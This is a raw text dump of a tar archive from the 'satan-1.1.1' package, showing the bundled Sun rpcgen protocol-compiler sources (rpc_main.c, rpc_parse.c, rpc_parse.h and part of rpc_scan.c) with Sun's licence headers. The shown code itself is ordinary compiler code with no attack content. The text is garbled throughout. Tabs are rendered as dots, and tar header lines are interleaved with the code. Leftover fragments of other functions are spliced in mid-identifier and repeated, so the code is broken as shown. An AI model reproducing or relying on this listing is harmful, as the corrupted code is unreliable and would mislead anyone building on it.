*) l->val; ..if (def->def_kind != DEF_PROGRAM) { ...if (streq(def->def_name, stop)) { ....return (1); ...} else if (streq(def->def_name, type)) { ....return (0); ...} ..} .} .return (1); } def->def.pr.versions; vers != NULL; vers = vers->next) { ..puldefine(vers->vers_name, vers->vers_num); ..for (proc = vers->procs; proc != NULL; proc = proc->next) { ...if (!define_printed(proc, def->def.pr.versions)) { ....puldefine(proc->proc_name, proc->proc_num); ...} ...pprocdef(proc, vers); ..} .} } satan-1.1.1/src/rpcgen/rpc_main.c................................................................... 600 . 465 . 506 . 22151 5741546550 11726. ..................................................................................................... .............................................................................................................................................................................................................................................................../* @(#)rpc_main.c.2.2 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_main.c 1.7 87/06/24 (C) 1987 SMI"; #endif /* * rpc_main.c, Top level of the RPC protocol compiler. * Copyright (C) 1987, Sun Microsystems, Inc. */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/file.h> #include "rpc_util.h" #include "rpc_parse.h" #include "rpc_scan.h" #define EXTEND.1../* alias for TRUE */ struct commandline { .int cflag; .int hflag; .int lflag; .int sflag; .int mflag; .char *infile; .char *outfile; }; static char *cmdname; static char CPP[] = "cc"; #define CPPFLAGS "-C", "-E" static char *allv[] = { ."rpcgen", "-s", "udp", "-s", "tcp", }; static int allc = sizeof(allv)/sizeof(allv[0]); static c_output(); static h_output(); static s_output(); static l_output(); static do_registers(); static parseargs(); main(argc, argv) .int argc; .char *argv[]; { .struct commandline cmd; .if (!parseargs(argc, argv, &cmd)) { ..f_print(stderr, ..."usage: %s infile\n", cmdname); ..f_print(stderr, ..." %s [-c | -h | -l | -m] [-o outfile] [infile]\n", ...cmdname); ..f_print(stderr, ..." %s [-s udp|tcp]* [-o outfile] [infile]\n", ...cmdname); ..exit(1); .} .if (cmd.cflag) { ..c_output(cmd.infile, "-DRPC_XDR", !EXTEND, cmd.outfile); .} else if (cmd.hflag) { ..h_output(cmd.infile, "-DRPC_HDR", !EXTEND, cmd.outfile); .} else if (cmd.lflag) { ..l_output(cmd.infile, "-DRPC_CLNT", !EXTEND, cmd.outfile); .} else if (cmd.sflag || cmd.mflag) { ..s_output(argc, argv, cmd.infile, "-DRPC_SVC", !EXTEND, ... cmd.outfile, cmd.mflag); .} else { ..c_output(cmd.infile, "-DRPC_XDR", EXTEND, "_xdr.c"); ..reinitialize(); ..h_output(cmd.infile, "-DRPC_HDR", EXTEND, ".h"); ..reinitialize(); ..l_output(cmd.infile, "-DRPC_CLNT", EXTEND, "_clnt.c"); ..reinitialize(); ..s_output(allc, allv, cmd.infile, "-DRPC_SVC", EXTEND, ... "_svc.c", cmd.mflag); .} .exit(0); } /* * add extension to filename */ static char * extendfile(file, ext) .char *file; .char *ext; { .char *res; .char *p; .res = alloc(strlen(file) + strlen(ext) + 1); .if (res == NULL) { ..abort(); .} .p = strchr(file, '.'); .if (p == NULL) { ..p = file + strlen(file); .} .(void) strcpy(res, file); .(void) strcpy(res + (p - file), ext); .return (res); } /* * Open output file with given extension */ static open_output(infile, outfile) .char *infile; .char *outfile; { .if (outfile == NULL) { ..fout = stdout; ..return; .} .if (infile != NULL && streq(outfile, infile)) { ..f_print(stderr, "%s: output would overwrite %s\n", cmdname, ...infile); ..crash(); .} .fout = fopen(outfile, "w"); .if (fout == NULL) { ..f_print(stderr, "%s: unable to open ", cmdname); ..perror(outfile); ..crash(); .} .record_open(outfile); } /* * Open input file with given define for C-preprocessor */ static open_input(infile, define) .char *infile; .char *define; { .int pd[2]; .infilename = (infile == NULL) ? "<stdin>" : infile; .(void) pipe(pd); .switch (fork()) { .case 0: ..(void) close(1); ..(void) dup2(pd[1], 1); ..(void) close(pd[0]); ..execlp(CPP, CPP, CPPFLAGS, define, infile, NULL); ..perror("execlp"); ..exit(1); .case -1: ..perror("fork"); ..exit(1); .} .(void) close(pd[1]); .fin = fdopen(pd[0], "r"); .if (fin == NULL) { ..f_print(stderr, "%s: ", cmdname); ..perror(infilename); ..crash(); .} } /* * Compile into an XDR routine output file */ static c_output(infile, define, extend, outfile) .char *infile; .char *define; .int extend; .char *outfile; { .definition *def; .char *include; .char *outfilename; .long tell; .open_input(infile, define);. .outfilename = extend ? extendfile(infile, outfile) : outfile; .open_output(infile, outfilename); .f_print(fout, "#include <sys/time.h>\n"); .f_print(fout, "#include <rpc/rpc.h>\n"); .if (infile && (include = extendfile(infile, ".h"))) { ..f_print(fout, "#include \"%s\"\n", include); ..free(include); .} .tell = ftell(fout); .while (def = get_definition()) { ..emit(def); .} .if (extend && tell == ftell(fout)) { ..(void) unlink(outfilename); .} } /* * Compile into an XDR header file */ static h_output(infile, define, extend, outfile) .char *infile; .char *define; .int extend; .char *outfile; { .definition *def; .char *outfilename; .long tell; .open_input(infile, define); .outfilename = extend ? extendfile(infile, outfile) : outfile; .open_output(infile, outfilename); .tell = ftell(fout); .while (def = get_definition()) { ..print_datadef(def); .} .if (extend && tell == ftell(fout)) { ..(void) unlink(outfilename); .} } /* * Compile into an RPC service */ static s_output(argc, argv, infile, define, extend, outfile, nomain) .int argc; .char *argv[]; .char *infile; .char *define; .int extend; .char *outfile; .int nomain; { .char *include; .definition *def; .int foundprogram; .char *outfilename; .open_input(infile, define); .outfilename = extend ? extendfile(infile, outfile) : outfile; .open_output(infile, outfilename); .f_print(fout, "#include <stdio.h>\n"); .f_print(fout, "#include <sys/time.h>\n"); .f_print(fout, "#include <rpc/rpc.h>\n"); .if (infile && (include = extendfile(infile, ".h"))) { ..f_print(fout, "#include \"%s\"\n", include); ..free(include); .} .foundprogram = 0; .while (def = get_definition()) { ..foundprogram |= (def->def_kind == DEF_PROGRAM); .} .if (extend && !foundprogram) { ..(void) unlink(outfilename); ..return; .} .if (nomain) { ..write_programs((char *)NULL); .} else { ..write_most(); ..do_registers(argc, argv); ..write_rest(); ..write_programs("static"); .} } static l_output(infile, define, extend, outfile) .char *infile; .char *define; .int extend; .char *outfile; { .char *include; .definition *def; .int foundprogram; .char *outfilename; .open_input(infile, define); .outfilename = extend ? extendfile(infile, outfile) : outfile; .open_output(infile, outfilename); .f_print(fout, "#include <sys/time.h>\n"); .f_print(fout, "#include <rpc/rpc.h>\n"); .if (infile && (include = extendfile(infile, ".h"))) { ..f_print(fout, "#include \"%s\"\n", include); ..free(include); .} .foundprogram = 0; .while (def = get_definition()) { ..foundprogram |= (def->def_kind == DEF_PROGRAM); .} .if (extend && !foundprogram) { ..(void) unlink(outfilename); ..return; .} .write_stubs(); } /* * Perform registrations for service output */ static do_registers(argc, argv) .int argc; .char *argv[]; { .int i; .for (i = 1; i < argc; i++) { ..if (streq(argv[i], "-s")) { ...write_register(argv[i + 1]); ...i++; ..} .} } /* * Parse command line arguments */ static parseargs(argc, argv, cmd) .int argc; .char *argv[]; .struct commandline *cmd; { .int i; .int j; .char c; .char flag[(1 << 8 * sizeof(char))]; .int nflags; .cmdname = argv[0]; .cmd->infile = cmd->outfile = NULL; .if (argc < 2) { ..return (0); .} .flag['c'] = 0; .flag['h'] = 0; .flag['s'] = 0; .flag['o'] = 0; .flag['l'] = 0; .flag['m'] = 0; .for (i = 1; i < argc; i++) { ..if (argv[i][0] != '-') { ...if (cmd->infile) { ....return (0); ...} ...cmd->infile = argv[i]; ..} else { ...for (j = 1; argv[i][j] != 0; j++) { ....c = argv[i][j]; ....switch (c) { ....case 'c': ....case 'h': ....case 'l': ....case 'm': .....if (flag[c]) { ......return (0); .....} .....flag[c] = 1; .....break; ....case 'o': ....case 's': .....if (argv[i][j - 1] != '-' || ..... argv[i][j + 1] != 0) { ......return (0); .....} .....flag[c] = 1; .....if (++i == argc) { ......return (0); .....} .....if (c == 's') { ......if (!streq(argv[i], "udp") && ...... !streq(argv[i], "tcp")) { .......return (0); ......} .....} else if (c == 'o') { ......if (cmd->outfile) { .......return (0); ......} ......cmd->outfile = argv[i]; .....} .....goto nextarg; ....default: .....return (0); ....} ...} .nextarg: ...; ..} .} .cmd->cflag = flag['c']; .cmd->hflag = flag['h']; .cmd->sflag = flag['s']; .cmd->lflag = flag['l']; .cmd->mflag = flag['m']; .nflags = cmd->cflag + cmd->hflag + cmd->sflag + cmd->lflag + cmd->mflag; .if (nflags == 0) { ..if (cmd->outfile != NULL || cmd->infile == NULL) { ...return (0); ..} .} else if (nflags > 1) { ..return (0); .} .return (1); } ef); .} .if (extend && tell == ftell(fout)) { ..(void) unlink(outfilename); .} } /* * Compile into an XDR header file */ static h_output(infile, define, extend, outfile) .char *infile; .char *define; .int extend; .char *outfile; { .definition *def; .char *outfilename; .long tell; .open_input(infile, define); .outfilename = extend ? extendfile(infile, outfile) : outfile; .open_output(infile, outfilensatan-1.1.1/src/rpcgen/rpc_parse.c.................................................................. 600 . 465 . 506 . 22043 5741525610 12106. ........................................................................ ................................................................................................................................................................................................................................................................. .........................../* @(#)rpc_parse.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_parse.c 1.4 87/04/28 (C) 1987 SMI"; #endif /* * rpc_parse.c, Parser for the RPC protocol compiler * Copyright (C) 1987 Sun Microsystems, Inc. */ #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include "rpc_util.h" #include "rpc_scan.h" #include "rpc_parse.h" static isdefined(); static def_struct(); static def_program(); static def_enum(); static def_const(); static def_union(); static def_typedef(); static get_declaration(); static get_type(); static unsigned_dec(); /* * return the next definition you see */ definition * get_definition() { .definition *defp; .token tok; .defp = ALLOC(definition); .get_token(&tok); .switch (tok.kind) { .case TOK_STRUCT: ..def_struct(defp); ..break; .case TOK_UNION: ..def_union(defp); ..break; .case TOK_TYPEDEF: ..def_typedef(defp); ..break; .case TOK_ENUM: ..def_enum(defp); ..break; .case TOK_PROGRAM: ..def_program(defp); ..break; .case TOK_CONST: ..def_const(defp); ..break; .case TOK_EOF: ..return (NULL); ..break; .default: ..error("definition keyword expected"); .} .scan(TOK_SEMICOLON, &tok); .isdefined(defp); .return (defp); } static isdefined(defp) .definition *defp; { .STOREVAL(&defined, defp); } static def_struct(defp) .definition *defp; { .token tok; .declaration dec; .decl_list *decls; .decl_list **tailp; .defp->def_kind = DEF_STRUCT; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_LBRACE, &tok); .tailp = &defp->def.st.decls; .do { ..get_declaration(&dec, DEF_STRUCT); ..decls = ALLOC(decl_list); ..decls->decl = dec; ..*tailp = decls; ..tailp = &decls->next; ..scan(TOK_SEMICOLON, &tok); ..peek(&tok); .} while (tok.kind != TOK_RBRACE); .get_token(&tok); .*tailp = NULL; } static def_program(defp) .definition *defp; { .token tok; .version_list *vlist; .version_list **vtailp; .proc_list *plist; .proc_list **ptailp; .defp->def_kind = DEF_PROGRAM; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_LBRACE, &tok); .vtailp = &defp->def.pr.versions; .scan(TOK_VERSION, &tok); .do { ..scan(TOK_IDENT, &tok); ..vlist = ALLOC(version_list); ..vlist->vers_name = tok.str; ..scan(TOK_LBRACE, &tok); ..ptailp = &vlist->procs; ..do { ...plist = ALLOC(proc_list); ...get_type(&plist->res_prefix, &plist->res_type, DEF_PROGRAM); ...if (streq(plist->res_type, "opaque")) { ....error("illegal result type"); ...} ...scan(TOK_IDENT, &tok); ...plist->proc_name = tok.str; ...scan(TOK_LPAREN, &tok); ...get_type(&plist->arg_prefix, &plist->arg_type, DEF_PROGRAM); ...if (streq(plist->arg_type, "opaque")) { ....error("illegal argument type"); ...} ...scan(TOK_RPAREN, &tok); ...scan(TOK_EQUAL, &tok); ...scan_num(&tok); ...scan(TOK_SEMICOLON, &tok); ...plist->proc_num = tok.str; ...*ptailp = plist; ...ptailp = &plist->next; ...peek(&tok); ..} while (tok.kind != TOK_RBRACE); ..*vtailp = vlist; ..vtailp = &vlist->next; ..scan(TOK_RBRACE, &tok); ..scan(TOK_EQUAL, &tok); ..scan_num(&tok); ..vlist->vers_num = tok.str; ..scan(TOK_SEMICOLON, &tok); ..scan2(TOK_VERSION, TOK_RBRACE, &tok); .} while (tok.kind == TOK_VERSION); .scan(TOK_EQUAL, &tok); .scan_num(&tok); .defp->def.pr.prog_num = tok.str; .*vtailp = NULL; } static def_enum(defp) .definition *defp; { .token tok; .enumval_list *elist; .enumval_list **tailp; .defp->def_kind = DEF_ENUM; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_LBRACE, &tok); .tailp = &defp->def.en.vals; .do { ..scan(TOK_IDENT, &tok); ..elist = ALLOC(enumval_list); ..elist->name = tok.str; ..elist->assignment = NULL; ..scan3(TOK_COMMA, TOK_RBRACE, TOK_EQUAL, &tok); ..if (tok.kind == TOK_EQUAL) { ...scan_num(&tok); ...elist->assignment = tok.str; ...scan2(TOK_COMMA, TOK_RBRACE, &tok); ..} ..*tailp = elist; ..tailp = &elist->next; .} while (tok.kind != TOK_RBRACE); .*tailp = NULL; } static def_const(defp) .definition *defp; { .token tok; .defp->def_kind = DEF_CONST; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_EQUAL, &tok); .scan2(TOK_IDENT, TOK_STRCONST, &tok); .defp->def.co = tok.str; } static def_union(defp) .definition *defp; { .token tok; .declaration dec; .case_list *cases; .case_list **tailp; .defp->def_kind = DEF_UNION; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_SWITCH, &tok); .scan(TOK_LPAREN, &tok); .get_declaration(&dec, DEF_UNION); .defp->def.un.enum_decl = dec; .tailp = &defp->def.un.cases; .scan(TOK_RPAREN, &tok); .scan(TOK_LBRACE, &tok); .scan(TOK_CASE, &tok); .while (tok.kind == TOK_CASE) { ..scan(TOK_IDENT, &tok); ..cases = ALLOC(case_list); ..cases->case_name = tok.str; ..scan(TOK_COLON, &tok); ..get_declaration(&dec, DEF_UNION); ..cases->case_decl = dec; ..*tailp = cases; ..tailp = &cases->next; ..scan(TOK_SEMICOLON, &tok); ..scan3(TOK_CASE, TOK_DEFAULT, TOK_RBRACE, &tok); .} .*tailp = NULL; .if (tok.kind == TOK_DEFAULT) { ..scan(TOK_COLON, &tok); ..get_declaration(&dec, DEF_UNION); ..defp->def.un.default_decl = ALLOC(declaration); ..*defp->def.un.default_decl = dec; ..scan(TOK_SEMICOLON, &tok); ..scan(TOK_RBRACE, &tok); .} else { ..defp->def.un.default_decl = NULL; .} } static def_typedef(defp) .definition *defp; { .declaration dec; .defp->def_kind = DEF_TYPEDEF; .get_declaration(&dec, DEF_TYPEDEF); .defp->def_name = dec.name; .defp->def.ty.old_prefix = dec.prefix; .defp->def.ty.old_type = dec.type; .defp->def.ty.rel = dec.rel; .defp->def.ty.array_max = dec.array_max; } static get_declaration(dec, dkind) .declaration *dec; .defkind dkind; { .token tok; .get_type(&dec->prefix, &dec->type, dkind); .dec->rel = REL_ALIAS; .if (streq(dec->type, "void")) { ..return; .} .scan2(TOK_STAR, TOK_IDENT, &tok); .if (tok.kind == TOK_STAR) { ..dec->rel = REL_POINTER; ..scan(TOK_IDENT, &tok); .} .dec->name = tok.str; .if (peekscan(TOK_LBRACKET, &tok)) { ..if (dec->rel == REL_POINTER) { ...error("no array-of-pointer declarations -- use typedef"); ..} ..dec->rel = REL_VECTOR; ..scan_num(&tok); ..dec->array_max = tok.str; ..scan(TOK_RBRACKET, &tok); .} else if (peekscan(TOK_LANGLE, &tok)) { ..if (dec->rel == REL_POINTER) { ...error("no array-of-pointer declarations -- use typedef"); ..} ..dec->rel = REL_ARRAY; ..if (peekscan(TOK_RANGLE, &tok)) { ...dec->array_max = "~0";./* unspecified size, use max */ ..} else { ...scan_num(&tok); ...dec->array_max = tok.str; ...scan(TOK_RANGLE, &tok); ..} .} .if (streq(dec->type, "opaque")) { ..if (dec->rel != REL_ARRAY && dec->rel != REL_VECTOR) { ...error("array declaration expected"); ..} .} else if (streq(dec->type, "string")) { ..if (dec->rel != REL_ARRAY) { ...error("variable-length array declaration expected"); ..} .} } static get_type(prefixp, typep, dkind) .char **prefixp; .char **typep; .defkind dkind; { .token tok; .*prefixp = NULL; .get_token(&tok); .switch (tok.kind) { .case TOK_IDENT: ..*typep = tok.str; ..break; .case TOK_STRUCT: .case TOK_ENUM: .case TOK_UNION: ..*prefixp = tok.str; ..scan(TOK_IDENT, &tok); ..*typep = tok.str; ..break; .case TOK_UNSIGNED: ..unsigned_dec(typep); ..break; .case TOK_SHORT: ..*typep = "short"; ..(void) peekscan(TOK_INT, &tok); ..break; .case TOK_LONG: ..*typep = "long"; ..(void) peekscan(TOK_INT, &tok); ..break; .case TOK_VOID: ..if (dkind != DEF_UNION && dkind != DEF_PROGRAM) { ...error("voids allowed only inside union and program definitions"); ..} ..*typep = tok.str; ..break; .case TOK_STRING: .case TOK_OPAQUE: .case TOK_CHAR: .case TOK_INT: .case TOK_FLOAT: .case TOK_DOUBLE: .case TOK_BOOL: ..*typep = tok.str; ..break; .default: ..error("expected type specifier"); .} } static unsigned_dec(typep) .char **typep; { .token tok; .peek(&tok); .switch (tok.kind) { .case TOK_CHAR: ..get_token(&tok); ..*typep = "u_char"; ..break; .case TOK_SHORT: ..get_token(&tok); ..*typep = "u_short"; ..(void) peekscan(TOK_INT, &tok); ..break; .case TOK_LONG: ..get_token(&tok); ..*typep = "u_long"; ..(void) peekscan(TOK_INT, &tok); ..break; .case TOK_INT: ..get_token(&tok); ..*typep = "u_int"; ..break; .default: ..*typep = "u_int"; ..break; .} } .defp->def_kind = DEF_CONST; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_EQUAL, &tok); .scan2(TOK_IDENT, TOK_STRCONST, &tok); .defp->def.co = tok.str; } static def_union(defp) .definition *defp; { .token tok; .declaration dec; .case_list *cases; .case_list **tailp; .defp->def_kind = DEF_UNION; .scan(TOK_IDENT, &tok); .defp->def_name = tok.str; .scan(TOK_SWITCH, &tok); .scan(TOK_LPAREN, &tok); .get_declaration(&dec, DEF_UNION); .defp->def.un.enum_decl = dsatan-1.1.1/src/rpcgen/rpc_parse.h.................................................................. 400 . 465 . 506 . 6533 4456447224 12105. .......................................................................... ................................................................................................................................................................................................................................................................. ........................./* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* @(#)rpc_parse.h 1.3 87/03/09 (C) 1987 SMI */ /* * rpc_parse.h, Definitions for the RPCL parser * Copyright (C) 1987, Sun Microsystems, Inc. */ enum defkind { .DEF_CONST, .DEF_STRUCT, .DEF_UNION, .DEF_ENUM, .DEF_TYPEDEF, .DEF_PROGRAM }; typedef enum defkind defkind; typedef char *const_def; enum relation { .REL_VECTOR,./* fixed length array */ .REL_ARRAY,./* variable length array */ .REL_POINTER,./* pointer */ .REL_ALIAS,./* simple */ }; typedef enum relation relation; struct typedef_def { .char *old_prefix; .char *old_type; .relation rel; .char *array_max; }; typedef struct typedef_def typedef_def; struct enumval_list { .char *name; .char *assignment; .struct enumval_list *next; }; typedef struct enumval_list enumval_list; struct enum_def { .enumval_list *vals; }; typedef struct enum_def enum_def; struct declaration { .char *prefix; .char *type; .char *name; .relation rel; .char *array_max; }; typedef struct declaration declaration; struct decl_list { .declaration decl; .struct decl_list *next; }; typedef struct decl_list decl_list; struct struct_def { .decl_list *decls; }; typedef struct struct_def struct_def; struct case_list { .char *case_name; .declaration case_decl; .struct case_list *next; }; typedef struct case_list case_list; struct union_def { .declaration enum_decl; .case_list *cases; .declaration *default_decl; }; typedef struct union_def union_def; struct proc_list { .char *proc_name; .char *proc_num; .char *arg_type; .char *arg_prefix; .char *res_type; .char *res_prefix; .struct proc_list *next; }; typedef struct proc_list proc_list; struct version_list { .char *vers_name; .char *vers_num; .proc_list *procs; .struct version_list *next; }; typedef struct version_list version_list; struct program_def { .char *prog_num; .version_list *versions; }; typedef struct program_def program_def; struct definition { .char *def_name; .defkind def_kind; .union { ..const_def co; ..struct_def st; ..union_def un; ..enum_def en; ..typedef_def ty; ..program_def pr; .} def; }; typedef struct definition definition; /* @(#)rpc_parse.h.2.1 88/08/01 4.0 RPCSRC */ definition *get_definition(); TOK_LONG: ..get_token(&tok); ..*typep = "u_long"; ..(void) peekscan(TOK_INT, &tok); ..break; .case TOK_INT: ..get_token(&tok); ..*typep = "u_int"; ..break; .default:satan-1.1.1/src/rpcgen/rpc_scan.c................................................................... 600 . 465 . 506 . 20372 5741525616 11731. ............................................................................................ ................................................................................................................................................................................................................................................................. ......./* @(#)rpc_scan.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_scan.c 1.6 87/06/24 (C) 1987 SMI"; #endif /* * rpc_scan.c, Scanner for the RPC protocol compiler * Copyright (C) 1987, Sun Microsystems, Inc. */ #include <stdio.h> #include <ctype.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include "rpc_scan.h" #include "rpc_util.h" #define startcomment(where) (where[0] == '/' && where[1] == '*') #define endcomment(where) (where[-1] == '*' && where[0] == '/') static int pushed = 0;./* is a token pushed */ static token lasttok;./* last token, if pushed */ static unget_token(); static findstrconst(); static findconst(); static findkind(); static cppline(); static directive(); static printdirective(); static docppline(); /* * scan expecting 1 given token */ void scan(expect, tokp) .tok_kind expect; .token *tokp; { .get_token(tokp); .if (tokp->kind != expect) { ..expected1(expect); .} } /* * scan expecting 2 given tokens */ void scan2(expect1, expect2, tokp) .tok_kind expect1; .tok_kind expect2; .token *tokp; { .get_token(tokp); .if (tokp->kind != expect1 && tokp->kind != expect2) { ..expected2(expect1, expect2); .} } /* * scan expecting 3 given token */ void scan3(expect1, expect2, expect3, tokp) .tok_kind expect1; .tok_kind expect2; .tok_kind expect3; .token *tokp; { .get_token(tokp); .if (tokp->kind != expect1 && tokp->kind != expect2 . && tokp->kind != expect3) { ..expected3(expect1, expect2, expect3); .} } /* * scan expecting a constant, possibly symbolic */ void scan_num(tokp) .token *tokp; { .get_token(tokp); .switch (tokp->kind) { .case TOK_IDENT: ..break; .default: ..error("constant or identifier expected"); .} } /* * Peek at the next token */ void peek(tokp) .token *tokp; { .get_token(tokp); .unget_token(tokp); } /* * Peek at the next token and scan it if it matches what you expect */ int peekscan(expect, tokp) .tok_kind expect; .token *tokp; { .peek(tokp); .if (tokp->kind == expect) { ..get_token(tokp); ..return (1); .} .return (0); } /* * Get the next token, printing out any directive that are encountered. */ void get_token(tokp) .token *tokp; { .int commenting; .if (pushed) { ..pushed = 0; ..*tokp = lasttok; ..return; .} .commenting = 0; .for (;;) { ..if (*where == 0) { ...for (;;) { ....if (!fgets(curline, MAXLINESIZE, fin)) { .....tokp->kind = TOK_EOF; .....*where = 0; .....return; ....} ....linenum++; ....if (commenting) { .....break; ....} else if (cppline(curline)) { .....docppline(curline, &linenum, ...... &infilename); ....} else if (directive(curline)) { .....printdirective(curline); ....} else { .....break; ....} ...} ...where = curline; ..} else if (isspace(*where)) { ...while (isspace(*where)) { ....where++;./* eat */ ...} ..} else if (commenting) { ...where++; ...if (endcomment(where)) { ....where++; ....commenting--; ...} ..} else if (startcomment(where)) { ...where += 2; ...commenting++; ..} else { ...break; ..} .} ./* . * 'where' is not whitespace, comment or directive Must be a token! . */ .switch (*where) { .case ':': ..tokp->kind = TOK_COLON; ..where++; ..break; .case ';': ..tokp->kind = TOK_SEMICOLON; ..where++; ..break; .case ',': ..tokp->kind = TOK_COMMA; ..where++; ..break; .case '=': ..tokp->kind = TOK_EQUAL; ..where++; ..break; .case '*': ..tokp->kind = TOK_STAR; ..where++; ..break; .case '[': ..tokp->kind = TOK_LBRACKET; ..where++; ..break; .case ']': ..tokp->kind = TOK_RBRACKET; ..where++; ..break; .case '{': ..tokp->kind = TOK_LBRACE; ..where++; ..break; .case '}': ..tokp->kind = TOK_RBRACE; ..where++; ..break; .case '(': ..tokp->kind = TOK_LPAREN; ..where++; ..break; .case ')': ..tokp->kind = TOK_RPAREN; ..where++; ..break; .case '<': ..tokp->kind = TOK_LANGLE; ..where++; ..break; .case '>': ..tokp->kind = TOK_RANGLE; ..where++; ..break; .case '"': ..tokp->kind = TOK_STRCONST; ..findstrconst(&where, &tokp->str); ..break; .case '-': .case '0': .case '1': .case '2': .case '3': .case '4': .case '5': .case '6': .case '7': .case '8': .case '9': ..tokp->kind = TOK_IDENT; ..findconst(&where, &tokp->str); ..break; .default: ..if (!(isalpha(*where) || *where == '_')) { ...char buf[100]; ...char *p; ...s_print(buf, "illegal character in file: "); ...p = buf + strlen(buf); ...if (isprint(*where)) { ....s_print(p, "%c", *where); ...} else { ....s_print(p, "%d", *where); ...} ...error(buf); ..} ..findkind(&where, tokp); ..break; .} } static unget_token(tokp) .token *tokp; { .lasttok = *tokp; .pushed = 1; } static findstrconst(str, val) .char **str; .char **val; { .char *p; .int size; .p = *str; .do { ..*p++; .} while (*p && *p != '"'); .if (*p == 0) { ..error("unterminated string constant"); .} .p++; .size = p - *str; .*val = alloc(size + 1); .(void) strncpy(*val, *str, size); .(*val)[size] = 0; .*str = p; } static findconst(str, val) .char **str; .char **val; { .char *p; .int size; .p = *str; .if (*p == '0' && *(p + 1) == 'x') { ..p++; ..do { ...p++; ..} while (isxdigit(*p)); .} else { ..do { ...p++; ..} while (isdigit(*p)); .} .size = p - *str; .*val = alloc(size + 1); .(void) strncpy(*val, *str, size); .(*val)[size] = 0; .*str = p; } static token symbols[] = { ... {TOK_CONST, "const"}, ... {TOK_UNION, "union"}, ... {TOK_SWITCH, "switch"}, ... {TOK_CASE, "case"}, ... {TOK_DEFAULT, "default"}, ... {TOK_STRUCT, "struct"}, ... 